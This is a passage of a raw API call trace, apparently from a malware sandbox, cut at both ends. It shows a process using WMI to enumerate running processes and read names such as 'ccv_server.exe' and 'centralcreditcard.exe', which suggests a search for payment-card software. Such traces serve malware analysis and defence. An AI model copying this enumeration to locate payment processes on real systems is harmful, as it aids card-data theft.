[3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x562f850) returned 0x0 [0214.634] IUnknown:AddRef (This=0x562f850) returned 0x4 [0214.634] IUnknown:Release (This=0x562f850) returned 0x3 [0214.634] IUnknown:Release (This=0x562f850) returned 0x2 [0214.634] CoTaskMemFree (pv=0x56320a8) [0214.634] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.634] IUnknown:AddRef (This=0x562f850) returned 0x3 [0214.634] IWbemClassObject:Get (in: This=0x562f850, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.634] IWbemClassObject:Get (in: This=0x562f850, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2244\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.634] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2244\"") returned 0x66 [0214.634] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2244\"") returned 0x66 [0214.634] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.635] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.635] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.635] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.635] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x56320a8) returned 0x0 [0214.636] WbemDefPath:IUnknown:QueryInterface (in: This=0x56320a8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.636] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56320a8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5631498) returned 0x0 [0214.636] WbemDefPath:IUnknown:Release (This=0x56320a8) returned 0x0 [0214.636] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631498, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5631498) returned 0x0 [0214.636] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631498, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.636] WbemDefPath:IUnknown:AddRef (This=0x5631498) returned 0x3 [0214.636] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631498, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.636] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631498, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.636] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631498, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x56320b8) returned 0x0 [0214.636] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56320b8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.636] WbemDefPath:IUnknown:Release (This=0x56320b8) returned 0x3 [0214.636] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.636] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.637] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631498, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.637] WbemDefPath:IUnknown:Release (This=0x5631498) returned 0x2 [0214.637] WbemDefPath:IUnknown:Release (This=0x5631498) returned 0x1 [0214.637] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.637] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.637] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631498, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5631498) returned 0x0 [0214.637] WbemDefPath:IUnknown:AddRef (This=0x5631498) returned 0x3 [0214.637] WbemDefPath:IUnknown:Release (This=0x5631498) returned 0x2 [0214.637] WbemDefPath:IWbemPath:SetText (This=0x5631498, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2244\"") returned 0x0 [0214.637] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.637] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.637] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.637] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.637] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.637] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.637] IWbemClassObject:Get (in: This=0x562f850, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2696568*=0, plFlavor=0x269656c*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ccv_server.exe", varVal2=0x0), pType=0x2696568*=8, plFlavor=0x269656c*=0) returned 0x0 [0214.637] SysStringByteLen (bstr="ccv_server.exe") returned 0x1c [0214.637] SysStringByteLen (bstr="ccv_server.exe") returned 0x1c [0214.637] IWbemClassObject:Get (in: This=0x562f850, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2696568*=8, plFlavor=0x269656c*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ccv_server.exe", varVal2=0x0), pType=0x2696568*=8, plFlavor=0x269656c*=0) returned 0x0 [0214.637] SysStringByteLen (bstr="ccv_server.exe") returned 0x1c [0214.637] SysStringByteLen (bstr="ccv_server.exe") returned 0x1c [0214.638] CoTaskMemAlloc (cb=0x4) returned 0x56320e8 [0214.638] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x56320e8, puReturned=0x267acc0 | out: apObjects=0x56320e8*=0x562f9e8, puReturned=0x267acc0*=0x1) returned 0x0 [0214.639] IUnknown:QueryInterface (in: This=0x562f9e8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x562f9e8) returned 0x0 [0214.639] IUnknown:QueryInterface (in: This=0x562f9e8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.639] IUnknown:QueryInterface (in: This=0x562f9e8, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.639] IUnknown:AddRef (This=0x562f9e8) returned 0x3 [0214.639] IUnknown:QueryInterface (in: This=0x562f9e8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.639] IUnknown:QueryInterface (in: This=0x562f9e8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.639] IUnknown:QueryInterface (in: This=0x562f9e8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x562f9ec) returned 0x0 [0214.639] IMarshal:GetUnmarshalClass (in: This=0x562f9ec, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.639] IUnknown:Release (This=0x562f9ec) returned 0x3 [0214.639] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.639] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.639] IUnknown:QueryInterface (in: This=0x562f9e8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.640] IUnknown:Release (This=0x562f9e8) returned 0x2 [0214.640] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.640] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.640] IUnknown:QueryInterface (in: This=0x562f9e8, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x562f9e8) returned 0x0 [0214.640] IUnknown:AddRef (This=0x562f9e8) returned 0x4 [0214.640] IUnknown:Release (This=0x562f9e8) returned 0x3 [0214.640] IUnknown:Release (This=0x562f9e8) returned 0x2 [0214.640] CoTaskMemFree (pv=0x56320e8) [0214.640] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.640] IUnknown:AddRef (This=0x562f9e8) returned 0x3 [0214.640] IWbemClassObject:Get (in: This=0x562f9e8, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.640] IWbemClassObject:Get (in: This=0x562f9e8, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2288\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.640] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2288\"") returned 0x66 [0214.641] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2288\"") returned 0x66 [0214.641] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.641] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.641] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.641] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.642] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x56320e8) returned 0x0 [0214.642] WbemDefPath:IUnknown:QueryInterface (in: This=0x56320e8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.642] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56320e8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5631578) returned 0x0 [0214.642] WbemDefPath:IUnknown:Release (This=0x56320e8) returned 0x0 [0214.642] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631578, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5631578) returned 0x0 [0214.642] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631578, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.642] WbemDefPath:IUnknown:AddRef (This=0x5631578) returned 0x3 [0214.642] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631578, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.643] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631578, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.643] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631578, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x56320f8) returned 0x0 [0214.643] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56320f8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.643] WbemDefPath:IUnknown:Release (This=0x56320f8) returned 0x3 [0214.643] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.643] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.643] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631578, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.643] WbemDefPath:IUnknown:Release (This=0x5631578) returned 0x2 [0214.643] WbemDefPath:IUnknown:Release (This=0x5631578) returned 0x1 [0214.643] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.643] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.643] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631578, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5631578) returned 0x0 [0214.643] WbemDefPath:IUnknown:AddRef (This=0x5631578) returned 0x3 [0214.643] WbemDefPath:IUnknown:Release (This=0x5631578) returned 0x2 [0214.643] WbemDefPath:IWbemPath:SetText (This=0x5631578, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2288\"") returned 0x0 [0214.643] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.643] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.643] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.643] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.643] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.643] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.643] IWbemClassObject:Get (in: This=0x562f9e8, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2696df0*=0, plFlavor=0x2696df4*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="centralcreditcard.exe", varVal2=0x0), pType=0x2696df0*=8, plFlavor=0x2696df4*=0) returned 0x0 [0214.644] SysStringByteLen (bstr="centralcreditcard.exe") returned 0x2a [0214.644] SysStringByteLen (bstr="centralcreditcard.exe") returned 0x2a [0214.644] IWbemClassObject:Get (in: This=0x562f9e8, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2696df0*=8, plFlavor=0x2696df4*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="centralcreditcard.exe", varVal2=0x0), pType=0x2696df0*=8, plFlavor=0x2696df4*=0) returned 0x0 [0214.644] SysStringByteLen (bstr="centralcreditcard.exe") returned 0x2a [0214.644] SysStringByteLen (bstr="centralcreditcard.exe") returned 0x2a [0214.644] CoTaskMemAlloc (cb=0x4) returned 0x5632128 [0214.644] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5632128, puReturned=0x267acc0 | out: apObjects=0x5632128*=0x562fb80, puReturned=0x267acc0*=0x1) returned 0x0 [0214.681] IUnknown:QueryInterface (in: This=0x562fb80, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x562fb80) returned 0x0 [0214.681] IUnknown:QueryInterface (in: This=0x562fb80, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.681] IUnknown:QueryInterface (in: This=0x562fb80, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.681] IUnknown:AddRef (This=0x562fb80) returned 0x3 [0214.681] IUnknown:QueryInterface (in: This=0x562fb80, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.682] IUnknown:QueryInterface (in: This=0x562fb80, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.682] IUnknown:QueryInterface (in: This=0x562fb80, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x562fb84) returned 0x0 [0214.682] IMarshal:GetUnmarshalClass (in: This=0x562fb84, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.682] IUnknown:Release (This=0x562fb84) returned 0x3 [0214.682] CoGetContextToken (in: 